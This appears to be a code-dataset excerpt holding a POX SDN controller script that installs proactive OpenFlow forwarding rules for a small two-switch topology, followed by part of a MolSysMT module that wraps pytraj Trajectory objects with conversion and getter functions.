read_blob_data_mp4(4) | 33.462121 | 77 | 0.561693 | 510 | 4,417 | 4.652941 | 0.170588 | 0.10788 | 0.050569 | 0.057311 | 0.873156 | 0.859671 | 0.859671 | 0.859671 | 0.859671 | 0.859671 | 0 | 0.011676 | 0.340729 | 4,417 | 132 | 78 | 33.462121 | 0.803228 | 0.022866 | 0 | 0.808081 | 0 | 0 | 0.200813 | 0.021038 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050505 | false | 0 | 0.010101 | 0 | 0.060606 | 0.212121 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e921982367930869bfd76e0dd7f5268354cf4b9a | 4,082 | py | Python | software-defined-networks/Topo2_Proactive.py | hasithsen/CSNE | 30d0386186a6684207bc5cf9f75b3b13f8a5bbc8 | [
"MIT"
] | null | null | null | software-defined-networks/Topo2_Proactive.py | hasithsen/CSNE | 30d0386186a6684207bc5cf9f75b3b13f8a5bbc8 | [
"MIT"
] | null | null | null | software-defined-networks/Topo2_Proactive.py | hasithsen/CSNE | 30d0386186a6684207bc5cf9f75b3b13f8a5bbc8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Implement proactive controller for below topology.
[c1]
/\
/ \
/ \
/ \
[s1]--------[s2]
/\ /\
[h1] [h2] [h3] [h4]
[cX] - controller
[sX] - switch
[hX] - host
"""
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpidToStr
__email__ = "i@hsen.tech"
__date__ = "2020/4/1"
log = core.getLogger()
s1_dpid=0
s2_dpid=1
def _handle_ConnectionUp(event):
""" Send rules to populate flow table of each switch """
# We have 2 switches
global s1_dpid
global s2_dpid
print "ConnectionUp: ", dpidToStr(event.connection.dpid)
# Print connection dpid for each switch
for m in event.connection.features.ports:
if m.name == "s1-eth1":
s1_dpid = event.connection.dpid
print "s1_dpid=", s1_dpid
elif m.name == "s2-eth1":
s2_dpid = event.connection.dpid
print "s2_dpid=", s2_dpid
# Rules for s1
if event.connection.dpid == s1_dpid:
# Flood ARP packets
msg = of.ofp_flow_mod()
msg.priority=1
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0806
msg.actions.append(of.ofp_action_output(port= of.OFPP_ALL))
event.connection.send(msg)
# If destination is 10.0.0.1, outport is 1
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.1"
msg.actions.append(of.ofp_action_output(port=1))
event.connection.send(msg)
# If destination is 10.0.0.2, outport is 2
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.2"
msg.actions.append(of.ofp_action_output(port=2))
event.connection.send(msg)
# If destination is 10.0.0.3, outport is 3
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.3"
msg.actions.append(of.ofp_action_output(port=3))
event.connection.send(msg)
# If destination is 10.0.0.4, outport is 3
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.4"
msg.actions.append(of.ofp_action_output(port=3))
event.connection.send(msg)
# Rules for s2
elif event.connection.dpid == s2_dpid:
# Flood ARP packets
msg = of.ofp_flow_mod()
msg.priority=1
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0806
msg.actions.append(of.ofp_action_output(port= of.OFPP_ALL))
event.connection.send(msg)
# If destination is 10.0.0.1, outport is 3
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.1"
msg.actions.append(of.ofp_action_output(port=3))
event.connection.send(msg)
# If destination is 10.0.0.2, outport is 3
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.2"
msg.actions.append(of.ofp_action_output(port=3))
event.connection.send(msg)
# If destination is 10.0.0.3, outport is 1
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.3"
msg.actions.append(of.ofp_action_output(port=1))
event.connection.send(msg)
# If destination is 10.0.0.4, outport is 2
msg = of.ofp_flow_mod()
msg.priority=10
msg.idle_timeout = 0
msg.hard_timeout = 0
msg.match.dl_type = 0x0800
msg.match.nw_dst = "10.0.0.4"
msg.actions.append(of.ofp_action_output(port=2))
event.connection.send(msg)
def launch():
core.openflow.addListenerByName("ConnectionUp", _handle_ConnectionUp)
| 26.335484 | 71 | 0.645272 | 654 | 4,082 | 3.866972 | 0.163609 | 0.039541 | 0.086991 | 0.04745 | 0.740214 | 0.71807 | 0.71807 | 0.71807 | 0.71807 | 0.71807 | 0 | 0.070771 | 0.228074 | 4,082 | 154 | 72 | 26.506494 | 0.731831 | 0.120529 | 0 | 0.772277 | 0 | 0 | 0.042534 | 0 | 0 | 0 | 0.01836 | 0 | 0 | 0 | null | null | 0 | 0.029703 | null | null | 0.029703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a65559e2bf44bc476e017d9f096a88e02a712d5 | 61,569 | py | Python | molsysmt/forms/classes/api_pytraj_Trajectory.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 3 | 2020-06-02T03:55:52.000Z | 2022-03-21T04:43:52.000Z | molsysmt/forms/classes/api_pytraj_Trajectory.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 28 | 2020-06-24T00:55:53.000Z | 2021-07-16T22:09:19.000Z | molsysmt/forms/classes/api_pytraj_Trajectory.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 1 | 2021-06-17T18:55:25.000Z | 2021-06-17T18:55:25.000Z | from molsysmt._private_tools.exceptions import *
from molsysmt.forms.common_gets import *
import numpy as np
from pytraj import Trajectory as _pytraj_Trajectory
from molsysmt.molecular_system import molecular_system_components
form_name='pytraj.Trajectory'
is_form={
_pytraj_Trajectory : form_name,
}
info=["",""]
has = molecular_system_components.copy()
for ii in ['elements', 'bonds', 'coordinates', 'box']:
has[ii]=True
def to_pytraj_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.api_pytraj_Topology import to_pytraj_Topology as pytraj_Topology_to_pytraj_Topology
tmp_item = item.topology
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
else:
tmp_molecular_system = None
tmp_item, tmp_molecular_system = pytraj_Topology_to_pytraj_Topology(tmp_item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_molsysmt_MolSys(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.molsys.classes import from_pytraj_Trajectory as pytraj_Topology_to_molsysmt_MolSys
from molsysmt.forms.classes.api_molsysmt_MolSys import to_molsysmt_MolSys as molsysmt_MolSys_to_molsysmt_MolSys
tmp_item, tmp_molecular_system = pytraj_Topology_to_molsysmt_MolSys(item, molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_MolSys_to_molsysmt_MolSys(tmp_item, molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_molsysmt_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.topology.classes import from_pytraj_Trajectory as pytraj_Trajectory_to_molsysmt_Topology
from molsysmt.forms.classes.api_molsysmt_Topology import to_molsysmt_Topology as molsysmt_Topology_to_molsysmt_Topology
tmp_item, tmp_molecular_system = pytraj_Trajectory_to_molsysmt_Topology(item, molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_Topology_to_molsysmt_Topology(tmp_item,
molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_molsysmt_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.trajectory.classes import from_pytraj_Trajectory as pytraj_Trajectory_to_molsysmt_Trajectory
from molsysmt.forms.classes.api_molsysmt_Trajectory import to_molsysmt_Trajectory as molsysmt_Trajectory_to_molsysmt_Trajectory
tmp_item, tmp_molecular_system = pytraj_Trajectory_to_molsysmt_Trajectory(item,
molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_Trajectory_to_molsysmt_Trajectory(tmp_item,
molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_pytraj_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all', copy_if_all=True):
if (atom_indices is 'all') and (frame_indices is 'all'):
raise NotImplementedError()
else:
raise NotImplementedError()
def extract_item(item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def add(item, from_item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError()
###### Get
## atom
def get_index_from_atom (item, indices='all', frame_indices='all'):
return get_atom_index_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_id_from_atom (item, indices='all', frame_indices='all'):
return get_atom_id_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_name_from_atom (item, indices='all', frame_indices='all'):
return get_atom_name_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_type_from_atom (item, indices='all', frame_indices='all'):
return get_atom_type_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_atom (item, indices='all', frame_indices='all'):
if indices is 'all':
return get_n_atoms_from_system (item)
else:
return indices.shape[0]
def get_n_groups_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bonded_atoms_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_inner_bond_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_inner_bond_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_inner_bonded_atoms_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_inner_bonds_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
tmp_item = item.xyz * 0.1 * unit.nanometers
if indices is not 'all':
tmp_item = tmp_item[:,atom_indices,:]
if frame_indices is not 'all':
tmp_item = tmp_item[frame_indices,:,:]
return tmp_item
def get_frame_from_atom(item, indices='all', frame_indices='all'):
tmp_step = get_step_from_system(item, frame_indices=frame_indices)
tmp_time = get_time_from_system(item, frame_indices=frame_indices)
tmp_coordinates = get_coordinates_from_atom(item, indices=indices, frame_indices=frame_indices)
tmp_box = get_box_from_system(item, frame_indices=frame_indices)
return tmp_step, tmp_time, tmp_coordinates, tmp_box
def get_n_frames_from_atom(item, indices='all', frame_indices='all'):
return get_n_frames_from_system(item, indices='all', frame_indices='all')
def get_form_from_atom(item, indices='all', frame_indices='all'):
return form_name
## group
def get_index_from_group (item, indices='all', frame_indices='all'):
return get_group_index_from_group (item, indices=indices, frame_indices=frame_indices)
def get_id_from_group (item, indices='all', frame_indices='all'):
return get_group_id_from_group (item, indices=indices, frame_indices=frame_indices)
def get_name_from_group (item, indices='all', frame_indices='all'):
return get_group_name_from_group (item, indices=indices, frame_indices=frame_indices)
def get_type_from_group (item, indices='all', frame_indices='all'):
return get_group_type_from_group (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## component
def get_index_from_component (item, indices='all', frame_indices='all'):
return get_component_index_from_component (item, indices=indices, frame_indices=frame_indices)
def get_id_from_component (item, indices='all', frame_indices='all'):
return get_component_id_from_component (item, indices=indices, frame_indices=frame_indices)
def get_name_from_component (item, indices='all', frame_indices='all'):
return get_component_name_from_component (item, indices=indices, frame_indices=frame_indices)
def get_type_from_component (item, indices='all', frame_indices='all'):
return get_component_type_from_component (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
